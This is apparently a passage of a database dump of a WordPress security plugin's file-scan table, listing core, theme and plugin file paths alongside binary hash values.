���&��','��U�4�n��x�F�ڿp��G�?�>���Ge','',0,'?'),('��H���N��f��5�+','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�m~��X��Pa','����\0���:��Q���3z �Ɩo�`','',0,'?'),('��i0�F?��\0N6','wp-content/themes/morfeu/inc/comments-loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Tė��$YNr/�컡\n','�%��*��ޒ8��������g��-���L','',0,'?'),('��\Z�vc�0��\'_p�','wp-content/plugins/unyson/framework/helpers/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�_� ��}��Mq','�63�7��o~.y�̶�Z/�?^8놓3d\n�\0','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�*=(������M9xq','*><�r�b�L�^�E�?2{X1x�)�(��6','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'b�\0��0!�qd=�','O@‰�#�9,��h�k���@$X��N�a�','',0,'?'),('�P�<��ߐ�qֹ��?','wp-content/themes/wen-business/inc/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';t��V@���*K','�.�>$<L\n/x�š�:3	��%�˻�ΒȞ','',0,'?'),('�R8�3��\"YA>�G!','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.zh-TW.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|0�L�κ�nx<\"��9�','\Za>��cY9��Y�5Xv��dU�0ׁX���9','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A����#|]�j�p�','�A:�\n1��l��s�_��2[4Q�f)','',0,'?'),('�bSz]L9?*9N��','wp-content/plugins/unyson/framework/extensions/builder/manifest.php',0,'�\n��ʴ��G�>Š�','�\n��ʴ��G�>Š�','�aDu����7��)�L(�.n�e֨�%ɱ����','',0,'?'),('�e��P�-�+�T�;ğ�','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/webmaster-tools.php',0,'�UE�Yx|�He����','�UE�Yx|�He����','Ζ��![l �9�\Z�n:8��\'$!a�;+�r','',0,'?'),('�jQN�$�w\\	ZrE\\W','wp-content/themes/skt-construction-lite/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�הdXG�OV[�,',':F�z�\rS7C���i��g��&y�@�d\\>��','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�lrs�����+�o','wp-content/themes/alpha-store/lib/metaboxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Np�L�e�n��','IzOd*~4S�Ϯ�磗�6\\�a~��MT���','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8_�^O�º�������','� F�l��K����ks��5Y�_�~t� ���OE','',0,'?'),('���ؘ�{�>�ǽ�fd�','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/events.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�	1{���HkX���8',' p�5�v��N���ܞW H�_�`b-��]�','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('����L��6	��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��0�쮺�7�v0��\Z','wp-content/themes/skt-construction-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h[�>�	������>','���\Z�z�q�}ƌ씬\'z,낅�c�լ0,��','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�֒��y�DБ�#�','L��)Ӊ�\"�.4l��N�U�7�+#��R}���','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v����j&�Ƶ','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('����~��j�l��Z','wp-content/themes/hueman/assets/front/fonts/titillium-regular-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7L�\\�\'\0��0��*','\\����K��&�l��\r�G��~Lw��3h�','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('��a��R�~�j���P�F','wp-content/plugins/dw-social-share/assets/js/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��_�pG��.��C`*',' �E�B\'��pG�k�U��WZ�\rm�i��…�','',0,'?'),('���#�V(k]$����(','wp-content/themes/twentynineteen/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�\"MY���~��','�lG����w��}V���>��%{n��\\�z��;�','',0,'?'),('���I	2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;�	m8','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('�	� n�@شu�]�w','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/eu.js',0,')�=�7��i\Z�ۯ^m',')�=�7��i\Z�ۯ^m','=?<P����Mx����~�\n1ɕAOu��U|@','',0,'?'),('��O�4���ƈ�X','wp-content/themes/fluida/includes/tgmpa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�`�̩V5w\n=�%X��','#����\"�/��g;������֯fe�h��ϔ','',0,'?'),('�7��ٍ�4B@\n\no���','wp-content/themes/tortuga/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Z��[��y�I~�','iMF�]������jXK�_�2	�#iӽ���','',0,'?'),('�Zj�y�Q�2�,;4{','wp-content/plugins/spam-captcha/lang/spam_captcha-no_NO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�ԫө���*\\n.','^�AD�.t���+���C6yt�x�\n��@�=�','',0,'?'),('�\\p�+���a=a1:P�#','wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('�]�S��6	n��Wj�','wp-content/themes/panoramic/library/includes/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�55ȷ������','�KD�����Q�Y8B��O0ۉ$��]��k��','',0,'?'),('�a�<�d��Q�8���','wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php',0,'>�0��9Z}�Mͨ�\\W','>�0��9Z}�Mͨ�\\W','v�p�N�ڠ?姮�Ϧ�T���`�����N��','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�r��z�q��R �\0��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/config.php',0,'49˨U�.wL��G','49˨U�.wL��G','E����jT�?���&����F%MP���h','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߿�O��K��fь','d���p�Z\rdc�2��=-#\r3o�G�','',0,'?'),('�������q0@�7��','wp-content/themes/relia/inc/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�7#�,o��=ia�-q�','^ù�i8�C}nʎ5ģ@pdD����L�L�:�8','',0,'?'),('���h_Ȕ��L�sC3d�','wp-content/themes/illdy/layout/css/pace.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��A�x6��-:�m=','D����]�]��5���UE�	5��Hrr�[ #\0ԙ','',0,'?'),('��2�۱��-��ْ>','wp-content/themes/wen-business/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','55���Rd��}�','٨x5\\�_�!!��hSd�	t���өr\nr','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('��f0��ͭ��~�)','wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�_rY+ʂ;�','��yU�]f��8���t�����l�L.','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�k���K\\Vl�','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��D���ׁ!��#��','wp-content/themes/precious-lite/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¾�T�P�3�����|','�trx�7沣�AU�<���iS]fځ�ḯ�d','',0,'?'),('��x�9\'<c5Љ��2','wp-content/themes/clean-magazine/js/clean-magazine-customizer-custom-scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��d���ϔ�i9�','wĕ��Ǔ\Z=҂�G�hh��V���]�`�@@/','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�/4>YwQ�On�K[','��^�j�=�n�X\Z?9r�\"�[���Pz��','',0,'?'),('��+�:��J�6a��Y�','wp-content/themes/clean-magazine/images/gallery/no-featured-image-1920x800.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��.��(h��c~&','�VR�\0�%�O�r0�B0z�)�PQ�ʶ�8v��','',0,'?'),('�����k�-b�Ț�','wp-content/themes/square/js/square-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}���Ѯ4?�@�4j�','�02�	s�H��k���؁pN*Cv��{���','',0,'?'),('��9N�_K�Ȱ�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_Verifier.php',0,'�W�\0\'��5%��','�W�\0\'��5%��','�|G�\Z���Qա�kK�C+�7���~��','',0,'?'),('�|�aV��~�[f��.','wp-content/themes/twentynineteen/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�#��(#�<��6','ikm�Ň���Sau�W��a`�L3	\ZK_L�','',0,'?'),('�!ۅ.�4��qdtP��','wp-content/plugins/akismet/views/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{ETJ�_q���n���','·^\n�b��q<v`x��K���Z�W��>�Gw��','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 5D�_�\'-�w','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�&8�]=	����R','h�Q�4n��ńY�9��޿�-ǚ7F�&8���ܷ','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y��{�\n5y3�','��.H��2�z��e�\\.�M�&l�P%OUV����','',0,'?'),('�;@����g�sLyesC','wp-content/themes/sg-window/img/icons/buzz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z&0�*Sj���Z����,','&�E�d���リ�G�ߎ:N��J�)�km��HBc','',0,'?'),('�q�A:��A�u��$��','wp-content/themes/nirvana/images/socials/YouTube.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Bh\0db!B�J���','ԃ|�!1�u��H*GF�S�b��ң�]�)L5�','',0,'?'),('�yU�f����V�?','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-category-filters.php',0,'}��qX�:(�&�1WA','}��qX�:(�&�1WA','ɜ�pJ�p�==��n�1RL �u�B�DR�y,��','',0,'?'),('�z9�	�`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('�|�&\Z�i��zMm`�\'','wp-content/themes/vega/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,Zu�� Y\n��LD��','_�VV�M�/�9�\0�	��=�؋��4�[\'��I�','',0,'?'),('��\Z5o��#R\'/��l','wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\Z>w���@�R-/Y�','B\nZ\Z��_p�n͂��Q?/�\r3s�}���)','',0,'?'),('���4����G��','wp-content/themes/travelify/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5J�� ���L8D��{A','������u3L,���k�@Nc��7L��0.','',0,'?'),('��w�#�Q������','wp-content/plugins/akismet/views/predefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#>ajϬa�����4�','�w�s��bN}�qY��7zo�U��u�\'���1','',0,'?'),('����v��[2C@x��','wp-content/themes/clean-magazine/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�H�,�^Y�P���FW','�`���\"_j�ri!I­,���Q\r!��*l$�j�','',0,'?'),('���	��P�j���(�','wp-content/themes/alpha-store/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��[��[���{gR','ވ�j6;}tL�Gɍ�]E�%	\0H���i��','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xd�]�G7�u�\n����','>k�\r���\\>�j(=��z� �p�]#t7�`�','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qu[�����ljD�','��Nnq�3!]��dl��3n���#Zf1��ne','',0,'?'),('����\\�\\w���','wp-content/themes/skt-construction-lite/images/slides/slider1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N~�p�^[\"=Dž|��1','���(��WE�٭0F&!�,���<����','',0,'?'),('����m��6	�d�Q9','wp-content/themes/nirvana/fonts/opensans-light-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kj�Q3�����$b�','#��*�\"8D}HL�\n��ܷC3}����x�j�j','',0,'?'),('��W,/?�h�ܚ�,$O','wp-content/plugins/unyson/framework/includes/option-types/background-image/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\"���1g��i�Q`','�}�S߿*V<�mc�n��3�P��<����M�v�1','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('��g��5���)�Qe','wp-content/themes/nirvana/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >\\�e�@��갮','o���(�5a��q���4mݣ�xH���','',0,'?'),('��Jc�	}�,3��4_��','wp-content/plugins/all-in-one-wp-security-and-firewall/js/masonry.pkgd.min.js',0,'G��ւ�p�4�����','G��ւ�p�4�����','i�̏�N�\r�h	9����fK)�6��G�-','',0,'?'),('�	v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('�\rb/#��Q����f�i','wp-content/themes/twentyseventeen/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"J��<���=��','G��[�\Zs��%�:��f��w��<�ú�\r�','',0,'?'),('�%CT��K�P��Ik,','wp-content/plugins/contact-form-7-modules/screenshot-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4i-Dd�[�0�(�O�','�սJDX�_l�9��[_P�İmz�5WKZ��~��','',0,'?'),('�*\0�U\'-,�M�','wp-content/themes/twentynineteen/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=#kQ\n�z��݋C','�uC���#ďAUf{Kb�|�\ZIl�L���٩','',0,'?'),('�1�鵿�Y�l�TKe','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_flat_0_aaaaaa_40x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�\r�,G���׉��','�@j�83t(�y���;���Τ����J\Z','',0,'?'),('�K�S<�\0n\n+����b','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/page-builder-column-item/static/js/scripts.js',0,'T�?�v�q\r\r~enj/','T�?�v�q\r\r~enj/','\'0��KR�f�ҍ \Z�2Į���@D@g','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CA������O�^�)','�/�y14~��(�6����>B&F��,�S���','',0,'?'),('�MCZ�%��\Z�:�a�x','wp-content/plugins/unyson/framework/extensions/backups/includes/log/init.php',0,'�+�;>`h��3ߏA','�+�;>`h��3ߏA','���k�l�� �U\\�A���%\0J��\Z�N(쇌��','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('�|[�-�l�@���k','wp-content/themes/clean-magazine/images/gallery/featured4-480x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gV�N{�ђ�]8��','M�R��(�taI�㚖M��\\�rivX����','',0,'?'),('��6��:�$4�-Tg5','wp-content/themes/twentynineteen/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��	���L`򊘖B[','���V\"��\ZkY�cnUkYY$-,��y�\r�','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,\"|i�0}�1K\ZG�{','޻��������xby#4z�l�:w�4�k%�','',0,'?'),('��i���KS�ϟ{��=','wp-content/themes/supernews/acmethemes/sidebar-widget/acme-ad.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɓ߭����Q̆I�l','���Hʄ Ĉ�>�+�J��̪����|4���q��','',0,'?'),('���ބ��P�R��','wp-content/themes/illdy/layout/images/front-page/front-page-project-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k`D]��å���5S','<\\L�#\0]���v�`�\\��H�>I��r�@','',0,'?'),('���I;���W�<L7','wp-content/themes/sg-window/publication/comments.php',0,'�ۨ?����d�e&|','�ۨ?����d�e&|','h�DU�:�_��!��!�A�>.�##�)�^�','',0,'?'),('��G�͘7.fL�K�Sk�','wp-content/themes/hueman/assets/front/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9OhMf��f�]>�','E�VS`$?�a�j`)��x�0��+X����K��','',0,'?'),('���!���Ow鏆','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr-Cyrl.js',0,'��w44l�Gp�]g�','��w44l�Gp�]g�','_9Q��(uX-�F�ć�C�f�6i�vN�','',0,'?'),('����tނҒ�6Y�','wp-content/themes/morfeu/assets/js/bootstrap/scrollspy.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��GA�	�b�m','Zb� �V/�U���;�\0�J���(','',0,'?'),('��Ey\0\0>p��୏\':','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�YD�CA-BMc�K�','����M�6D���}��O�Kni˴A��?','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�P9�sIuf��z�','��|��Z��@h��h��L�\\��R���&S�ݱ','',0,'?'),('������7)�$�','wp-content/themes/point/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ac����}$L��”�','�@�eݗ %�P�;ɹe�EӅ��[w�-�emu','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Uv��&x����N�','\0�{M��U�\rN.�)���-����`wH���','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('����Ž��H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ž�K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0�q2�l����d','ȩ~��0M���0\"���7	]1�sP�J�T','',0,'?'),('�ѐ���6p��_��N','wp-content/themes/point/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�@a)�w�nb}]+�','��v�V���Ձ��*|~�8��\0��x\0X','',0,'?'),('�-�(ҟ�oF�L���','wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ5�/�ҲP��C','�[T����4Gzݹo�ɓHL4�` �(��;�Gc','',0,'?'),('�9��f?���4ENX�','wp-content/themes/nirvana/styles/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Up��5�xbL�[/߫�','���tm�\\��ՑO��j���\'g�b��','',0,'?'),('�Bz�\rS����%��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.namejuice.php',0,'&���x�\ZP�]!oKC� ','&���x�\ZP�]!oKC� ','\r�D��s��J���Y�\0F6S�_\r4�����aw�','',0,'?'),('�H����o\'�U�XA�`�','wp-content/themes/nirvana/languages/zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#!�\"3���O+k�\n�h',']C4�a�\\�b�`~�-k_��0:�֥b�/��','',0,'?'),('�K��\r��N��\n�п','wp-content/themes/tortuga/inc/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�4jE�$O��5g�','�u��[�ѻ��I����݆,�6��j��� ���','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\n\0)�堽1ԕ','���w�x�@1Ό$��Ny�/�EB�_�l\Zy/}','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�h�w^�(�n���','wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5+I6N,^�~��','x�u]!�%�\Z�|8c�˹��?�<M+GG������','',0,'?'),('�pt_ Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�?���l����}','�Q���1*������~���(�Hq�\'�RR��','',0,'?'),('�w`t a<�8t���','wp-content/themes/the-minimal/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�5$��w?�W�o','BVEa�bv�\\ǘz1���L�����','',0,'?'),('�������X�\0T�O��','wp-content/themes/twentynineteen/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�,���	p�A��','\0�4݌����^\ZY��i�_�O��_�#','',0,'?'),('���\'(jli�����','wp-content/themes/twentytwenty/template-parts/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R0�5����wT��','�+�\\@o�g���\n�@��������','',0,'?'),('��(j�˟�otH��t��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.nl.php',0,'s�0~�#o�F@`.y\ZX�','s�0~�#o�F@`.y\ZX�','�J�^S�ÇҞv�\'��q�̓�\r	��s�����','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iÖO-^jN�%.1�','��\Z��>S�������� �glk/(N|V','',0,'?'),('��$�)���[�5��{��','wp-content/themes/sg-window/publication/fonts/menucon/menucon.svg',0,'�E[��Ą\n�Y�U&P','�E[��Ą\n�Y�U&P','Ll�l_K_}MmS	���>]�l��R�{\r{e�','',0,'?'),('������l���:�','wp-content/themes/vega/color-schemes/green.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����c��8 �;��2','�?�t���W�ѳ{�ʌڞ�N��*��pʸ�5�','',0,'?'),('��\n��Z��\".�]�k��','wp-content/plugins/unyson/framework/includes/option-types/typography/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uVGpH�MXщ4�','�\r����\0��@\'TG�[c�ʁyQ\r2P�$׽)�','',0,'?'),('��˳�}��N�3+Mg','wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:-��Eՠx�$�B',',�4�~aT�lS �fQO	f���Tӵ��;��)','',0,'?'),('����d��R	EOz��','wp-content/plugins/wordpress-seo/admin/views/tabs/advanced/rss.php',0,'�q��4��̗��0�c','�q��4��̗��0�c','�	�N��J�\\�����Ȁ�t���Po����','',0,'?'),('��j�`@���~ĕ7ܓ','wp-content/plugins/dw-megamenu/lib/render.php',0,'�\"��A�P|��|','�\"��A�P|��|','��E1ʯl�WWHxh�(�|�i�� @k','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?����^�D�T�!�N�','�LGB=o��\07|A��!�8���(Fe�','',0,'?'),('��ϗ�_���;\n','wp-content/themes/mh-magazine-lite/languages/pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J@2��-�B�0+','\'��ȭl��i�迊�\naH�\no�2R=L�v#','',0,'?'),('�����ͭ�	